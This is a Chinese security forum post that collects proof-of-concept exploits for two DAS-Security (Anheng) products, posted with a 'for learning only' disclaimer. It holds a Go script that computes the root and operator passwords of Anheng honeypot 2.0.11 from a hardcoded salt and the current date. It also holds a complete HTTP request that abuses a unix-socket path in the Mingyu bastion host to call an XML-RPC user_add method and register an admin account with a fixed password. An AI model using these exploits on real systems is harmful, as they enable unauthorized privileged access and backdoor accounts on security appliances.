DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 2147|回复: 0

[2023HW] 安恒漏洞 PoC 整理

[复制链接]

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 22:12:52 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

安恒蜜罐 2.0.11 提权漏洞


  1. package passwd

  2. import (
  3. "crypto/sha256"
  4. "fmt"
  5. "time"
  6. )

  7. func Main() {

  8. timestamp := time.Now().Unix()
  9. date := time.Unix(timestamp, 0).Format("2006-01-02")

  10. XXX1 := "1234567890!@#$%^&*()" + date + "root"
  11. XXXX1 := sha256.Sum256([]byte(XXX1))
  12. XXXXX1 := fmt.Sprintf("%x", XXXX1)[:16]
  13. VVV1 := "1234567890!@#$%^&*()" + date + "operator"
  14. VVVV1 := sha256.Sum256([]byte(VVV1))
  15. VVVVV1 := fmt.Sprintf("%x", VVVV1)[:16]
  16. println(fmt.Sprintf("[+] root     passwd ->  %s", XXXXX1))
  17. println(fmt.Sprintf("[+] operator passwd ->  %s", VVVVV1))

  18. }
复制代码

安恒明御运维审计与风险控制系统堡垒机任意用户注册


  1. POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
  2. Host: xxx
  3. Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
  4. Cache-Control: max-age=0
  5. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
  6. Sec-Ch-Ua-Mobile: ?0
  7. Sec-Ch-Ua-Platform: "Windows"
  8. Upgrade-Insecure-Requests: 1
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Sec-Fetch-Site: none
  12. Sec-Fetch-Mode: navigate
  13. Sec-Fetch-User: ?1
  14. Sec-Fetch-Dest: document
  15. Accept-Encoding: gzip, deflate
  16. Accept-Language: zh-CN,zh;q=0.9
  17. Connection: close
  18. Content-Length: 1121

  19. <?xml version="1.0"?>
  20. <methodCall>
  21. <methodName>web.user_add</methodName>
  22. <params>
  23. <param>
  24. <value>
  25. <array>
  26. <data>
  27. <value>
  28. <string>admin</string>
  29. </value>
  30. <value>
  31. <string>5</string>
  32. </value>
  33. <value>
  34. <string>XX.XX.XX.XX</string>
  35. </value>
  36. </data>
  37. </array>
  38. </value>
  39. </param>
  40. <param>
  41. <value>
  42. <struct>
  43. <member>
  44. <name>uname</name>
  45. <value>
  46. <string>deptadmin</string>
  47. </value>
  48. </member>
  49. <member>
  50. <name>name</name>
  51. <value>
  52. <string>deptadmin</string>
  53. </value>
  54. </member>
  55. <member>
  56. <name>pwd</name>
  57. <value>
  58. <string>Deptadmin@123</string>
  59. </value>
  60. </member>
  61. <member>
  62. <name>authmode</name>
  63. <value>
  64. <string>1</string>
  65. </value>
  66. </member>
  67. <member>
  68. <name>deptid</name>
  69. <value>
  70. <string></string>
  71. </value>
  72. </member>
  73. <member>
  74. <name>email</name>
  75. <value>
  76. <string></string>
  77. </value>
  78. </member>
  79. <member>
  80. <name>mobile</name>
  81. <value>
  82. <string></string>
  83. </value>
  84. </member>
  85. <member>
  86. <name>comment</name>
  87. <value>
  88. <string></string>
  89. </value>
  90. </member>
  91. <member>
  92. <name>roleid</name>
  93. <value>
  94. <string>101</string>
  95. </value>
  96. </member>
  97. </struct></value>
  98. </param>
  99. </params>
  100. </methodCall>
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-5-6 13:06 , Processed in 0.058006 second(s), 25 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表